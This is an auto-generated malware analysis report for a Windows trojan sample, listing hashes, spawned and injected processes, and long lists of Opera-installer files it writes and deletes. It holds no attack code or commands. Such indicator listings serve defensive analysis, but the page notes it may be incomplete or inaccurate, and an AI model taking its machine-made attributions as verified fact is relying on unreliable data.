Trojan.Win32.Swrort.3_08ae6fb562

by malwarelabrobot on December 20th, 2015 in Malware Descriptions.

Gen:Variant.Adware.Graftor.258672 (B) (Emsisoft), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 08ae6fb562e33c06ecb624c1b4d32087
SHA1: 2abbfbb78f6a8111777cde5e842dfdbb591cb0b1
SHA256: 0dbfb19c31b394b91b704b0970b38ae746b39450781cb0a4b3d4089d8a0232a7
SSDeep: 6144:m/kpcj5dw cYE1QqcDk7FVes/rCaKxIAPx 3yqb6p50CZ:m/21QqcDk7PrCauIMx8yqbpCZ
Size: 317440 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-11-30 10:51:25
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

6.tmp.exe:2524
6.tmp.exe:2540
6.tmp.exe:2444
6.tmp.exe:2488
6.tmp.exe:2496
6.tmp.exe:2452
26.tmp.exe:2440
UnityWebPlayer.exe:3196
1.tmp.exe:496
1.tmp.exe:1288
opera.exe:2936
opera.exe:2892
opera.exe:2828
opera.exe:2796
installer.exe:3724
installer.exe:1364
amisetup9338__14991.exe:912
amisetup9364__14991.exe:1752
opera_installer_20151219212422.exe:3408
opera_installer_20151219212422.exe:3448
amigo.exe:2536
opera_autoupdate.exe:3736
opera_autoupdate.exe:3572
launcher.exe:3612
launcher.exe:2296
setup.exe:2672
MailRuUpdater.exe:3616
MailRuUpdater.exe:3160
MailRuUpdater.exe:3536
opera_crashreporter.exe:2468

The Trojan injects its code into the following process(es):

opera.exe:2816
opera.exe:1432
opera.exe:3828
%original file name%.exe:468

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 6.tmp.exe:2540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.log (5399 bytes)

The process 6.tmp.exe:2444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.log (395 bytes)

The process 6.tmp.exe:2488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\be.pak (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\grey.zip (289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-80.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\1CF37043-6733-479C-9086-7B21A2292DDA.ico (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\cs.pak (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\da.pak (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera.exe (3703 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_autoupdate.version (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pt-BR.pak (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-80_contrast-white.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ca.pak (151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\es-419.pak (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\zh-CN.pak (123 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\nb.pak (136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\nl.pak (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-180.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-80.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\en-US.pak (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-140_contrast-white.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera.dll (465369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\de.pak (151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_150_percent.pak (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\he.pak (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\d3dcompiler_47.dll (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fr.pak (154 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\default_partner_content.json (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sw.pak (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\AD2FD2BD-0727-4AF7-8917-AAED8627ED47.ico (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\bn.pak (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\osmesa.dll (20507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\files_list (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\installer.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\license.txt (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\C665D993-1B49-4C2E-962C-BEB19993BB86.ico (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pl.pak (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-180_contrast-white.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\msvcp100.dll (1702 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\013E742B-287B-4228-A0B9-BD617E4E02A4.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\id.pak (134 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\es.pak (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\me.pak (139 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\398EE64D66758B5715368AA94044B13A (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\hr.pak (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-100.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\uk.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\mk.pak (218 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\76C397A8-9E8E-4706-8203-BD2878E9C618.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\7.tmp (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_100_percent.pak (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_200_percent.pak (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-140_contrast-white.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\3B6191A0-8BF3-11E2-9E96-0800200C9A66.ico (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Resources.pri (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\default_theme.zip (218 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\ab_tests.json (560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\vi.pak (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sk.pak (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\en-GB.pak (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\mojo_public_test_support.dll (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\th.pak (279 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\2A3F5C20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\tr.pak (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fy.pak (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-100.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\default_localized_themes.json (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\uz.pak (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\notification_default.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fr-CA.pak (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\1AF2CDD0-8BF3-11E2-9E96-0800200C9A66.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\te.pak (309 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\darkbreeze.zip (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\dbghelp.dll (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-180_contrast-white.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\F98D4D4C-8AA7-4619-A1E7-AC89B24558DD.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\launcher.exe (3770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\reine.zip (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\libEGL.dll (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\nn.pak (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\launcher.visualelementsmanifest.xml (317 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\zh-TW.pak (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\FF57F01A-0718-44B7-8A1F-8B15BC33A50B.ico (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\win8_importing.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\clearkeycdmadapter.dll (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_autoupdate.licenses (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Opera_34.0.2036.41_Setup[1].exe (17837417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\zu.pak (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\6D3582E1-6013-429F-BB34-C75B90CDD1F8.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fi.pak (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-100_contrast-white.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pt-PT.pak (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\6.tmp.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\landscape_photo.zip (299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\B478FE0C-0761-41C3-946F-CD1340356039.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\message_center_win8.dll (158 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\66DD4BB6-A3BA-4B11-AF7A-F4BF23E073B2.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sv.pak (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\gd.pak (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\af.pak (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\az.pak (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\hi.pak (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\0CD5F3A0-8BF6-11E2-9E96-0800200C9A66.ico (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-80_contrast-white.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\msvcr100.dll (3847 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.log (6313 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\wow_helper.exe (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\5BBBDD5B-EDC7-4168-9F5D-290AF826E716.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ja.pak (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\lv.pak (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sr.pak (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ru.pak (221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\bg.pak (221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-140.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ko.pak (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\icudtl.dat (76792 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pa.pak (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_125_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-180.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\398EE64D66758B5715368AA94044B13A (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ro.pak (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fil.pak (154 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\2F8F0E41-F521-45A4-9691-F664AFAFE67F.ico (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\07593226-C5C5-438B-86BE-3F6361CD5B10.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\it.pak (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\hu.pak (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.7z (261193 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\root_files_list (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\el.pak (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_crashreporter.exe (1785 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ms.pak (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422 (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera.pak (140036 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\clearkeycdm.dll (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.exe (17837417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\8D754F20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-100_contrast-white.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\libGLESv2.dll (12288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\kk.pak (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\server_tracking_data (641 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_250_percent.pak (3911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\snapshot_blob.bin (1795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\natives_blob.bin (1720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\widevinecdmadapter.dll (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\3BFDFA54-5DD6-4DFF-8B6C-C1715F306D6B.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\F3F34CBB-24FF-4830-9E87-1663E7A0A5EE.ico (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_autoupdate.exe (25429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-140.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\dictionaries.xml (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\lt.pak (150 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ta.pak (1612 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\CFD4BE41-4C6D-496A-ADDB-4095DFA1DD0E.ico (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\4C95ADC1-5FD9-449D-BC75-77CA217403AE.ico (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\be.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\grey.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Opera.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\1CF37043-6733-479C-9086-7B21A2292DDA.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\cs.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\da.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pt-BR.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\1AF2CDD0-8BF3-11E2-9E96-0800200C9A66.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\es-419.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\zh-CN.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\launcher.visualelementsmanifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\nl.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-180.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-80.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\en-US.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-140_contrast-white.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\de.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_150_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\he.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\d3dcompiler_47.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fr.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\default_partner_content.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sw.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\AD2FD2BD-0727-4AF7-8917-AAED8627ED47.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\bn.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\osmesa.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\files_list (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\installer.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\C665D993-1B49-4C2E-962C-BEB19993BB86.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pl.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-180_contrast-white.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\msvcp100.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\013E742B-287B-4228-A0B9-BD617E4E02A4.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\ab_tests.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\es.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\mk.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\me.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\id.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\hr.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-100.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\uk.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_autoupdate.version (0 bytes)
